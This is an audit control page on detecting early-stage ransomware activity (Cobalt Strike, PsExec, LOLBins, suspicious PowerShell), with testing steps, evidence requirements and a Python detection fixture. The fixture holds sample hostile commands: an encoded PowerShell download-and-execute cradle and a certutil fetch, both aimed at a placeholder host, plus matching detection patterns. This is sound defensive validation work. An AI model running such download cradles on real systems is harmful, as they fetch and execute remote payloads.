SI-4 / DE.CM-1 / CIS-8.5 NIST SP 800-53 Rev 5

Do you have detections for the early stages of ransomware (Cobalt Strike, PsExec, abuse of legitimate tools, suspicious PowerShell)?

Description

What this control does

This control requires deployment of detection rules and behavioral analytics to identify early-stage ransomware attack techniques including Cobalt Strike beacon activity, lateral movement via PsExec, living-off-the-land binaries (LOLBins), and malicious PowerShell execution. These indicators represent the reconnaissance, credential access, and lateral movement phases that occur before file encryption. Effective early-stage detection enables incident response teams to contain threats before ransomware payloads execute, preventing widespread encryption and data exfiltration.

Control objective

What auditing this proves

Demonstrate that the organization has implemented and validated detection capabilities for pre-ransomware attack behaviors including Cobalt Strike frameworks, administrative tool abuse, and suspicious scripting activity.

Associated risks

Risks this control addresses

  • Undetected Cobalt Strike beacons establish persistent command-and-control channels enabling attackers to maintain access and deploy ransomware payloads
  • Lateral movement using PsExec or similar remote execution tools spreads malware across the environment without triggering alerts
  • Abuse of legitimate administrative tools (WMI, scheduled tasks, RDP) blends malicious activity with normal operations evading signature-based detection
  • Obfuscated or encoded PowerShell commands execute reconnaissance scripts, credential dumping, or payload staging undetected
  • Delayed detection allows attackers to escalate privileges and disable backup systems before ransomware deployment
  • Living-off-the-land techniques using native Windows utilities (certutil, bitsadmin, rundll32) bypass application whitelisting and antivirus
  • Insufficient logging or detection coverage leaves blind spots during the critical pre-encryption phase when containment is most effective

Testing procedure

How an auditor verifies this control

  1. Obtain the current SIEM, EDR, and network detection rule repository including version numbers and last update dates
  2. Review detection rules specifically targeting Cobalt Strike indicators such as named pipe IOCs, beacon network patterns, Malleable C2 profiles, and process injection techniques
  3. Examine rules for PsExec detection including service creation events, named pipe usage (\pipe\psexesvc), and remote ADMIN$ share access patterns
  4. Analyze PowerShell logging configuration and detection logic covering script block logging (Event ID 4104), execution policy bypasses, encoded commands, suspicious cmdlets (Invoke-Expression, DownloadString), and AMSI bypass attempts
  5. Verify detection coverage for LOLBin abuse including certutil with URL parameters, wmic process calls, regsvr32 network connections, and mshta execution
  6. Request evidence of testing or validation for these detection rules including red team exercises, purple team validations, or MITRE ATT&CK emulation results from the past 12 months
  7. Select a sample of triggered alerts from the past quarter matching these detection categories and trace response actions taken
  8. Verify alert tuning documentation showing false positive reduction efforts while maintaining detection efficacy for these pre-ransomware indicators
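
As an added illustration that is not part of this control text, the Python below shows how the detection logic an auditor reviews in steps 3 to 5 can be exercised against constructed sample events: a service install named PSEXESVC, a PowerShell process launched with an encoded command whose decoded body contains a download cradle, and certutil invoked with a URL, alongside two benign events that must not fire. Event IDs, field names, hostnames and rule names are constructed to resemble Windows logs and a SIEM rule set; they are not taken from any product's schema.

```python
import base64
import re

# Constructed sample events, loosely modelled on Windows event log fields:
# 7045 = service installed, 4688 = process creation, 4104 = script block.
ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1')"
    .encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    {"id": 7045, "host": "ws01", "service_name": "PSEXESVC"},
    {"id": 4688, "host": "ws02",
     "command_line": f"powershell.exe -nop -w hidden -EncodedCommand {ENCODED}"},
    {"id": 4104, "host": "ws03", "script_block": "Get-ChildItem C:\\Users | Measure-Object"},
    {"id": 4688, "host": "ws04",
     "command_line": "certutil.exe -urlcache -split -f http://example.invalid/a.txt a.txt"},
    {"id": 7045, "host": "ws05", "service_name": "Spooler"},
]
# Cmdlets and aliases the testing procedure calls out as suspicious.
SUSPICIOUS_CMDLETS = re.compile(r"invoke-expression|\biex\b|downloadstring|downloadfile", re.I)

def decode_encoded_command(cmdline):
    """Decode a -EncodedCommand payload (base64 of UTF-16LE); None if absent or invalid.
    Only a subset of the parameter prefixes PowerShell accepts is handled here."""
    m = re.search(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def evaluate(event):
    """Return the names of the detection rules an event matches (empty if benign)."""
    hits = []
    if event["id"] == 7045 and "psexesvc" in event.get("service_name", "").lower():
        hits.append("psexec_service_install")
    if event["id"] == 4688:
        cmd = event["command_line"]
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            hits.append("powershell_encoded_command")
            if SUSPICIOUS_CMDLETS.search(decoded):  # inspect the decoded body, not the base64
                hits.append("powershell_download_cradle")
        if re.search(r"certutil(\.exe)?\b.*(-urlcache|https?://)", cmd, re.I):
            hits.append("lolbin_certutil_url")
    if event["id"] == 4104 and SUSPICIOUS_CMDLETS.search(event["script_block"]):
        hits.append("powershell_download_cradle")
    return hits

def run_detections(events):
    """Map (host, event id) to matched rule names; the benign events must map to []."""
    return {(e["host"], e["id"]): evaluate(e) for e in events}
```

Running the rules over a fixture like this, with both positive and negative cases, is the kind of validation evidence step 6 asks for, and the negative cases document the tuning work step 8 expects.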

Evidence required

Configuration exports from SIEM and EDR platforms containing the complete detection rule set with metadata, enable/disable status, and tuning parameters. Test reports or validation documentation from security tool testing, red team assessments, or MITRE ATT&CK framework coverage reports demonstrating detection capability. Sample alert logs with corresponding incident tickets showing detection in production and analyst response workflows.

Pass criteria

The organization maintains active, tested detection rules covering Cobalt Strike artifacts, PsExec lateral movement, PowerShell abuse techniques, and LOLBin misuse, with documented validation evidence from the past 12 months and demonstrated alert response workflows.